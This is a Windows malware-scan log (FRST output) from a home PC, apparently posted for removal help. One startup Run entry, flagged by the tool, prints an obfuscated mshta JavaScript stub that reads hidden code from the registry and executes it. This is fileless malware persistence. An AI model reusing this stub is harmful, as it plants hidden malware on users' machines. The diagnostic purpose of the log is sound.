HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-924763536-93737856-2869661127-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53753984 2015-07-18] (Skype Technologies S.A.)
HKU\S-1-5-21-924763536-93737856-2869661127-1000\...\Run: [**ac49aad3<*>] => mshta javascript:YKTfM8a="lesbPHGZt";N3x=new%20ActiveXObject("WScript.Shell");O9uceQw="FoIi";XULc3=N3x.RegRead("HKCU\\software\\89410848\\8f956f6e");YZC3oqT="kX";eval(XULc3);ttz9gHHS="gOskW"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2014-05-25] (Microsoft Corporation)
Startup: C:\Users\Mom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - HP Photosmart 5510 series.lnk [2014-08-15]
ShortcutTarget: Monitor Ink Alerts - HP Photosmart 5510 series.lnk -> C:\Program Files\HP\HP Photosmart 5510 series\Bin\HPStatusBL.dll (Hewlett-Packard Co.)
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => No File

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\S-1-5-21-924763536-93737856-2869661127-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = MSN UK | Hotmail, Outlook, Skype, Bing, Latest News, Photos and Videos
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-924763536-93737856-2869661127-1000 -> {61280EC1-E2ED-4F1A-94DF-013CA2D393D5} URL = https://www.google.com/search?q={searchTerms}
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll [2015-02-02] (Oracle Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll [2015-02-02] (Oracle Corporation)
Tcpip\Parameters: [DhcpNameServer] 194.168.4.100 194.168.8.100
Tcpip\..\Interfaces\{394329BF-2D3B-4468-A7DD-AF1FAB398EDA}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{C5CE6B46-A54D-42A2-9CA0-BC4CFE903BFF}: [DhcpNameServer] 194.168.4.100 194.168.8.100

FireFox:
========
FF ProfilePath: C:\Users\Mom\AppData\Roaming\Mozilla\Firefox\Profiles\csjr5mn3.default
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1211151.dll [2014-04-15] (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll [2015-02-02] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll [2015-02-02] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-16] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin-x32: Soda PDF 6 -> C:\Program Files (x86)\Soda PDF 6\np-previewer.dll [No File]

Chrome:
=======
CHR Profile: C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-05-24]
CHR Extension: (Google Drive) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-05-24]
CHR Extension: (YouTube) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-05-24]
CHR Extension: (Adblock Plus) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2014-09-25]
CHR Extension: (Google Search) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-05-24]
CHR Extension: (AdBlock) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-05-25]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-13]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-05-24]
CHR Extension: (Gmail) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-05-24]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 LULU Software CrashHandler; "C:\Program Files (x86)\Soda PDF 6\crash-handler-ws.exe" [X]
S4 Soda PDF 6; "C:\Program Files (x86)\Soda PDF 6\ws.exe" [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation)
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S1 MpKsl958ccaaf; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B81BF9EF-C1F0-48CC-8D15-C1F0E6522CDF}\MpKsl958ccaaf.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-08-11 23:13 - 2015-08-11 23:13 - 00011507 _____ C:\Users\Mom\Downloads\FRST.txt
2015-08-11 23:12 - 2015-08-11 23:13 - 00000000 ____D C:\FRST
2015-08-11 23:11 - 2015-08-11 23:11 - 02172928 _____ (Farbar) C:\Users\Mom\Downloads\FRST64.exe
2015-08-11 22:52 - 2015-08-11 23:02 - 00000000 ____D C:\AdwCleaner
2015-08-11 22:49 - 2015-08-11 22:49 - 00001459 _____ C:\Users\Mom\Desktop\AdwCleaner - Shortcut.lnk
2015-08-11 22:48 - 2015-08-11 22:48 - 02248704 _____ C:\Users\Mom\Downloads\AdwCleaner.exe
2015-08-09 17:40 - 2015-08-09 17:40 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2015-08-08 21:12 - 2015-08-08 21:12 - 00012552 _____ C:\Users\Mom\Desktop\attach.txt
2015-08-08 21:12 - 2015-08-08 21:11 - 00020015 _____ C:\Users\Mom\Desktop\dds.txt
2015-08-08 21:08 - 2015-08-08 21:08 - 00688992 ____R (Swearware) C:\Users\Mom\Desktop\dds.scr
2015-08-05 20:08 - 2015-08-05 20:36 - 00000000 ____D C:\Users\Mom\Downloads\Delicatessen.1991.BRRip.H264.AAC.Gopo
2015-08-05 19:45 - 2015-08-05 19:46 - 00000000 ____D C:\Users\Mom\Downloads\De grønne slagtere
2015-07-28 08:46 - 2015-07-25 19:07 - 00017856 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2015-07-28 08:46 - 2015-07-25 19:04 - 00765440 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2015-07-28 08:46 - 2015-07-25 19:04 - 00726528 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2015-07-28 08:46 - 2015-07-25 19:03 - 01085440 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2015-07-28 08:46 - 2015-07-25 19:03 - 00433664 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2015-07-28 08:46 - 2015-07-25 19:03 - 00227328 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2015-07-28 08:46 - 2015-07-25 19:03 - 00067584 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2015-07-28 08:46 - 2015-07-25 18:55 - 01145856 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2015-07-26 13:09 - 2015-07-26 13:09 - 00000000 ____D C:\Users\Mom\Documents\Visual Studio 2005
2015-07-25 10:02 - 2015-07-26 23:14 - 1514497241 ____R C:\Users\Mom\Downloads\BBC.The.Plantagenets.3of3.The.Death.of.Kings.HDTV.x264.AAC.MVGroup.org.mkv
2015-07-25 10:02 - 2015-07-26 16:12 - 1749917869 ____R C:\Users\Mom\Downloads\BBC.The.Plantagenets.2of3.An.English.Empire.HDTV.x264.AAC.MVGroup.org.mkv
2015-07-25 09:25 - 2015-07-26 12:22 - 1585950862 ____R C:\Users\Mom\Downloads\BBC.The.Plantagenets.1of3.The.Devils.Brood.HDTV.x264.AAC.MVGroup.org.mkv
2015-07-25 08:55 - 2015-07-25 09:08 - 00000000 ____D C:\Users\Mom\Downloads\Louise Hay - You Can Heal Your Life book and study course
2015-07-25 08:51 - 2015-07-25 09:33 - 1789018062 ____R C:\Users\Mom\Downloads\The Hollow Crown - S01E01 - 720P - SweSub.mp4
2015-07-21 16:53 - 2015-07-21 16:53 - 00002697 _____ C:\Users\Public\Desktop\Skype.lnk
2015-07-21 16:53 - 2015-07-21 16:53 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-07-21 16:53 - 2015-07-21 16:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2015-07-21 16:50 - 2015-07-21 16:50 - 01384064 _____ (Skype Technologies S.A.) C:\Users\Mom\Downloads\SkypeSetup.exe
2015-07-21 07:48 - 2015-07-15 04:19 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2015-07-21 07:48 - 2015-07-15 04:19 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2015-07-21 07:48 - 2015-07-15 04:19 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2015-07-21 07:48 - 2015-07-15 04:19 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2015-07-21 07:48 - 2015-07-15 03:55 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2015-07-21 07:48 - 2015-07-15 03:55 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2015-07-21 07:48 - 2015-07-15 03:55 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2015-07-21 07:48 - 2015-07-15 03:54 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2015-07-21 07:48 - 2015-07-15 02:59 - 00372224 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2015-07-21 07:48 - 2015-07-15 02:52 - 00299008 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 03154944 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 02603008 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 00696320 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 00192000 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 00139776 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2015-07-15 09:23 - 2015-07-09 18:58 - 00098304 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2015-07-15 09:23 - 2015-07-09 18:58 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2015-07-15 09:23 - 2015-07-09 18:58 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2015-07-15 09:23 - 2015-07-09 18:43 - 00566784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2015-07-15 09:23 - 2015-07-09 18:43 - 00173056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2015-07-15 09:23 - 2015-07-09 18:43 - 00093184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2015-07-15 09:23 - 2015-07-09 18:43 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2015-07-15 09:23 - 2015-07-09 18:42 - 00034816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2015-07-15 09:23 - 2015-07-02 22:21 - 19877376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-07-15 09:23 - 2015-07-02 22:08 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2015-07-15 09:23 - 2015-07-02 21:50 - 02279424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-07-15 09:23 - 2015-07-02 21:49 - 25193984 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-07-15 09:23 - 2015-07-02 21:46 - 00479232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-07-15 09:23 - 2015-07-02 21:40 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-07-15 09:23 - 2015-07-02 21:23 - 02885632 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-07-15 09:23 - 2015-07-02 21:19 - 12855296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-07-15 09:23 - 2015-07-02 21:12 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-07-15 09:23 - 2015-07-02 20:55 - 01310720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-07-15 09:23 - 2015-07-02 20:20 - 14453248 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-07-15 09:23 - 2015-07-02 19:59 - 01545728 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-07-15 09:23 - 2015-06-27 03:47 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-07-15 09:23 - 2015-06-27 03:43 - 05923840 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-07-15 09:23 - 2015-06-27 02:58 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2015-07-15 09:23 - 2015-06-27 02:39 - 04520448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-07-15 09:23 - 2015-06-25 19:09 - 00389832 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-07-15 09:23 - 2015-06-25 18:43 - 00342736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-07-15 09:23 - 2015-06-25 09:57 - 03207168 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-07-15 09:23 - 2015-06-20 21:06 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-07-15 09:23 - 2015-06-20 20:50 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-07-15 09:23 - 2015-06-20 20:49 - 00584192 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-07-15 09:23 - 2015-06-20 20:49 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-07-15 09:23 - 2015-06-20 20:40 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-07-15 09:23 - 2015-06-20 20:39 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-07-15 09:23 - 2015-06-20 20:34 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-07-15 09:23 - 2015-06-20 20:34 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-07-15 09:23 - 2015-06-20 20:34 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-07-15 09:23 - 2015-06-20 20:25 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-07-15 09:23 - 2015-06-20 20:21 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-07-15 09:23 - 2015-06-20 20:13 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-07-15 09:23 - 2015-06-20 20:07 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-07-15 09:23 - 2015-06-20 20:05 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-07-15 09:23 - 2015-06-20 19:48 - 00801280 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-07-15 09:23 - 2015-06-20 19:48 - 00720384 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-07-15 09:23 - 2015-06-20 19:46 - 02125824 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-07-15 09:23 - 2015-06-20 19:46 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-07-15 09:23 - 2015-06-20 19:02 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-07-15 09:23 - 2015-06-19 19:25 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-07-15 09:23 - 2015-06-19 19:25 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2015-07-15 09:23 - 2015-06-19 19:24 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2015-07-15 09:23 - 2015-06-19 19:24 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2015-07-15 09:23 - 2015-06-19 19:23 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-07-15 09:23 - 2015-06-19 19:17 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2015-07-15 09:23 - 2015-06-19 19:16 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2015-07-15 09:23 - 2015-06-19 19:13 - 00664064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2015-07-15 09:23 - 2015-06-19 19:13 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2015-07-15 09:23 - 2015-06-19 19:03 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2015-07-15 09:23 - 2015-06-19 18:57 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2015-07-15 09:23 - 2015-06-19 18:53 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2015-07-15 09:23 - 2015-06-19 18:52 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2015-07-15 09:23 - 2015-06-19 18:51 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-07-15 09:23 - 2015-06-19 18:40 - 02052608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-07-15 09:23 - 2015-06-19 18:40 - 00689152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-07-15 09:23 - 2015-06-19 18:39 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2015-07-15 09:23 - 2015-06-19 18:15 - 01951232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-07-15 09:23 - 2015-06-19 18:11 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-07-15 09:23 - 2015-06-17 18:47 - 00404992 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2015-07-15 09:23 - 2015-06-17 18:37 - 00312320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2015-07-15 09:23 - 2015-06-09 19:03 - 03180544 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2015-07-15 09:23 - 2015-06-09 19:03 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\RdpGroupPolicyExtension.dll
2015-07-15 09:23 - 2015-06-02 01:07 - 00254976 _____ (Microsoft Corporation) C:\Windows\system32\cewmdm.dll
2015-07-15 09:23 - 2015-06-02 00:47 - 00210432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cewmdm.dll
2015-07-15 09:22 - 2015-07-04 19:07 - 02087424 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2015-07-15 09:22 - 2015-07-04 18:48 - 01414656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2015-07-15 09:22 - 2015-07-01 21:56 - 00155584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2015-07-15 09:22 - 2015-07-01 21:56 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2015-07-15 09:22 - 2015-07-01 21:49 - 01461760 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 01216512 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00309760 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2015-07-15 09:22 - 2015-07-01 21:49 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2015-07-15 09:22 - 2015-07-01 21:48 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2015-07-15 09:22 - 2015-07-01 21:48 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2015-07-15 09:22 - 2015-07-01 21:47 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2015-07-15 09:22 - 2015-07-01 21:47 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2015-07-15 09:22 - 2015-07-01 21:43 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2015-07-15 09:22 - 2015-07-01 21:43 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2015-07-15 09:22 - 2015-07-01 21:39 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2015-07-15 09:22 - 2015-07-01 21:30 - 00552960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2015-07-15 09:22 - 2015-07-01 21:30 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2015-07-15 09:22 - 2015-07-01 21:30 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2015-07-15 09:22 - 2015-07-01 21:30 - 00221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2015-07-15 09:22 - 2015-07-01 21:30 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2015-07-15 09:22 - 2015-07-01 21:30 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2015-07-15 09:22 - 2015-07-01 21:30 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2015-07-15 09:22 - 2015-07-01 21:30 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
